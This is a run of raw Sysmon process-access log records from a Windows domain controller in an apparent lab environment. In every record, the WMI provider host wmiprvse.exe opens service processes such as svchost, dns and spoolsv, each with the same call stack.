22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697256Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697255Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.146{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A9-6039-2300-00000000AD01}2940C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22A0-6039-2100-00000000AD01}2392C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1700-00000000AD01}1640C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1600-00000000AD01}1540C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 22:55:40.130{05ADC7E1-70EB-603D-6E88-00000000AD01}68685148C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000001697246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-01 